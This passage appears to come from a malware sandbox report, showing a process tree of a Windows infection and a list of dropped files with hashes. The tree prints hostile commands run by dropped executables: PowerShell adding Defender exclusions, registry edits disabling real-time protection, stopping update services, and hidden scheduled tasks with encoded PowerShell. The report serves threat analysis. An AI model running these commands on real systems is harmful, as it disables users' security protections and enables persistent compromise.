                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:3392
                                                                                          • C:\Users\Admin\AppData\Local\Temp\onefile_3392_133634060443304000\stub.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            PID:2036
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:3616
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 64
                                                                                            6⤵
                                                                                            • Program crash
                                                                                            PID:1060
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000082001\quickaccesspopup.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\1000082001\quickaccesspopup.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:2900
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000088001\spain.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\1000088001\spain.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1720
                                                                                          • C:\Users\Admin\AppData\Local\Temp\1000088001\spain.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\1000088001\spain.exe"
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1168
                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000016001\4565458341.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\1000016001\4565458341.exe"
                                                                                      3⤵
                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                      • Checks BIOS information in registry
                                                                                      • Executes dropped EXE
                                                                                      • Identifies Wine through registry keys
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:1824
                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000017001\8614667af2.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\1000017001\8614667af2.exe"
                                                                                      3⤵
                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                      • Checks BIOS information in registry
                                                                                      • Executes dropped EXE
                                                                                      • Identifies Wine through registry keys
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1644
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                                                                        4⤵
                                                                                        • Enumerates system info in registry
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        • Suspicious use of SendNotifyMessage
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2864
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6589758,0x7fef6589768,0x7fef6589778
                                                                                          5⤵
                                                                                            PID:2616
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1164 --field-trial-handle=1372,i,3223511885617265872,5333701378854914168,131072 /prefetch:2
                                                                                            5⤵
                                                                                              PID:1664
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1372,i,3223511885617265872,5333701378854914168,131072 /prefetch:8
                                                                                              5⤵
                                                                                                PID:1584
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 --field-trial-handle=1372,i,3223511885617265872,5333701378854914168,131072 /prefetch:8
                                                                                                5⤵
                                                                                                  PID:1872
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2260 --field-trial-handle=1372,i,3223511885617265872,5333701378854914168,131072 /prefetch:1
                                                                                                  5⤵
                                                                                                    PID:3040
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2272 --field-trial-handle=1372,i,3223511885617265872,5333701378854914168,131072 /prefetch:1
                                                                                                    5⤵
                                                                                                      PID:1080
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1388 --field-trial-handle=1372,i,3223511885617265872,5333701378854914168,131072 /prefetch:2
                                                                                                      5⤵
                                                                                                        PID:2908
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1412 --field-trial-handle=1372,i,3223511885617265872,5333701378854914168,131072 /prefetch:1
                                                                                                        5⤵
                                                                                                          PID:3000
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2588 --field-trial-handle=1372,i,3223511885617265872,5333701378854914168,131072 /prefetch:1
                                                                                                          5⤵
                                                                                                            PID:2532
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3548 --field-trial-handle=1372,i,3223511885617265872,5333701378854914168,131072 /prefetch:8
                                                                                                            5⤵
                                                                                                              PID:2344
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1456 --field-trial-handle=1372,i,3223511885617265872,5333701378854914168,131072 /prefetch:8
                                                                                                              5⤵
                                                                                                                PID:1080
                                                                                                      • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                                        1⤵
                                                                                                          PID:2012
                                                                                                        • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                          C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Drops file in System32 directory
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:3748
                                                                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                            2⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Drops file in System32 directory
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:3816
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                            2⤵
                                                                                                              PID:2052
                                                                                                              • C:\Windows\system32\wusa.exe
                                                                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                3⤵
                                                                                                                • Drops file in Windows directory
                                                                                                                PID:3844
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                              2⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:2616
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                              2⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:3856
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              C:\Windows\system32\sc.exe stop wuauserv
                                                                                                              2⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:588
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              C:\Windows\system32\sc.exe stop bits
                                                                                                              2⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:2544
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              C:\Windows\system32\sc.exe stop dosvc
                                                                                                              2⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:3828
                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                              2⤵
                                                                                                              • Power Settings
                                                                                                              PID:3936
                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                              2⤵
                                                                                                              • Power Settings
                                                                                                              PID:3960
                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                              2⤵
                                                                                                              • Power Settings
                                                                                                              PID:2012
                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                              2⤵
                                                                                                              • Power Settings
                                                                                                              PID:2276
                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                              C:\Windows\system32\conhost.exe
                                                                                                              2⤵
                                                                                                                PID:1440
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                explorer.exe
                                                                                                                2⤵
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:2532
                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                              taskeng.exe {048A4F4C-5E2C-4A89-B2A1-6E0BFA6CC2A2} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                              1⤵
                                                                                                                PID:956
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\fzAYJsJ.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\fzAYJsJ.exe oU /KcAdidtm 385134 /S
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:3424
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                    3⤵
                                                                                                                      PID:1948
                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                        4⤵
                                                                                                                          PID:3500
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                            5⤵
                                                                                                                              PID:3440
                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                6⤵
                                                                                                                                  PID:1728
                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                              4⤵
                                                                                                                                PID:2272
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                  5⤵
                                                                                                                                    PID:948
                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                      6⤵
                                                                                                                                        PID:2264
                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                    4⤵
                                                                                                                                      PID:600
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                        5⤵
                                                                                                                                          PID:1500
                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                            6⤵
                                                                                                                                              PID:624
                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                          forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                          4⤵
                                                                                                                                            PID:1504
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                              5⤵
                                                                                                                                                PID:1736
                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                  6⤵
                                                                                                                                                    PID:2796
                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                4⤵
                                                                                                                                                  PID:1636
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                    5⤵
                                                                                                                                                      PID:1188
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                        6⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        PID:1536
                                                                                                                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                          7⤵
                                                                                                                                                            PID:3132
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "gseLWJjWQ" /SC once /ST 00:30:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                    3⤵
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:3944
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /run /I /tn "gseLWJjWQ"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2828
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /DELETE /F /TN "gseLWJjWQ"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2392
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1564
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                                            4⤵
                                                                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                            PID:3036
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:3808
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                                              4⤵
                                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                              PID:940
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /CREATE /TN "grgNEMPwK" /SC once /ST 00:22:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                            3⤵
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:2156
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /run /I /tn "grgNEMPwK"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:3732
                                                                                                                                                        • C:\Windows\system32\taskeng.exe
                                                                                                                                                          taskeng.exe {C9CF0D66-60C3-426C-B940-A417EA8D6BB9} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
                                                                                                                                                          1⤵
                                                                                                                                                            PID:788
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                              2⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                              PID:1388
                                                                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3200
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                2⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                PID:1608
                                                                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                                                                              1⤵
                                                                                                                                                                PID:1272

                                                                                                                                                              Network

                                                                                                                                                              MITRE ATT&CK Matrix

                                                                                                                                                              Replay Monitor

                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                              Downloads

                                                                                                                                                              • C:\Users\Admin\1000015002\609397bef6.exe
                                                                                                                                                                Filesize

                                                                                                                                                                1.8MB

                                                                                                                                                                MD5

                                                                                                                                                                3cc49f14ef0ef9ea942740dd6cff1536

                                                                                                                                                                SHA1

                                                                                                                                                                a4d4cac4fe01f027caeccb322a4f71a5b03abdd9

                                                                                                                                                                SHA256

                                                                                                                                                                d868becc66a066ad30691b268b4f0289585f2be543f4066c57c1d3bf8e589a19

                                                                                                                                                                SHA512

                                                                                                                                                                d529316301278a361aa5c67c1ab3899730ad14a10d748cca30ca55146a83f8b9294f89c9c811ea4c234388349dab5c4f5314ebbddd9e818287d388b4cb286309

                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                                                                                                                                Filesize

                                                                                                                                                                70KB

                                                                                                                                                                MD5

                                                                                                                                                                49aebf8cbd62d92ac215b2923fb1b9f5

                                                                                                                                                                SHA1

                                                                                                                                                                1723be06719828dda65ad804298d0431f6aff976

                                                                                                                                                                SHA256

                                                                                                                                                                b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                                                                                                                SHA512

                                                                                                                                                                bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                                                                Filesize

                                                                                                                                                                342B

                                                                                                                                                                MD5

                                                                                                                                                                f2ad94dcb668888bce4c6eae47d7b7af

                                                                                                                                                                SHA1

                                                                                                                                                                2f72ebb1a14a2d3e53515ec1a5b467d30c2e679a

                                                                                                                                                                SHA256

                                                                                                                                                                703b6eee6976567b99df074bbc45911f96339f313f043557909e6ab77eae08b0

                                                                                                                                                                SHA512

                                                                                                                                                                1698a1ecd41c48da2ced3b160d25318952c0c8c4a6137cc755e53ef8e3a82909548e513622e2cc21a46e9c23b9bdd58461cbe6686b654f79df47b01f32f6f815

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1
                                                                                                                                                                Filesize

                                                                                                                                                                264KB

                                                                                                                                                                MD5

                                                                                                                                                                f50f89a0a91564d0b8a211f8921aa7de

                                                                                                                                                                SHA1

                                                                                                                                                                112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                                                                                                SHA256

                                                                                                                                                                b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                                                                                                SHA512

                                                                                                                                                                bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp
                                                                                                                                                                Filesize

                                                                                                                                                                16B

                                                                                                                                                                MD5

                                                                                                                                                                aefd77f47fb84fae5ea194496b44c67a

                                                                                                                                                                SHA1

                                                                                                                                                                dcfbb6a5b8d05662c4858664f81693bb7f803b82

                                                                                                                                                                SHA256

                                                                                                                                                                4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

                                                                                                                                                                SHA512

                                                                                                                                                                b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp
                                                                                                                                                                Filesize

                                                                                                                                                                16B

                                                                                                                                                                MD5

                                                                                                                                                                18e723571b00fb1694a3bad6c78e4054

                                                                                                                                                                SHA1

                                                                                                                                                                afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                                                                                                                                                                SHA256

                                                                                                                                                                8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                                                                                                                                                                SHA512

                                                                                                                                                                43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                                                                                                                                                Filesize

                                                                                                                                                                153KB

                                                                                                                                                                MD5

                                                                                                                                                                59c558084e27740b145493ccf7e46138

                                                                                                                                                                SHA1

                                                                                                                                                                05de7aeab9bdbde7438520914ece33492cc6eb0c

                                                                                                                                                                SHA256

                                                                                                                                                                f5d5be64d682a85b508c468d870400e6f1efc25ffa90f843d2169a6de5016383

                                                                                                                                                                SHA512

                                                                                                                                                                cf3dfcba40dbab47ffc413f5a78aaa0f7d6c0ddb807b387626da78c6cd5b391e7124c61d25add1345ebd1b39fa53f01d86344ed6e4a7af37d53f40e52876e582

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe
                                                                                                                                                                Filesize

                                                                                                                                                                10.7MB

                                                                                                                                                                MD5

                                                                                                                                                                c09ff1273b09cb1f9c7698ed147bf22e

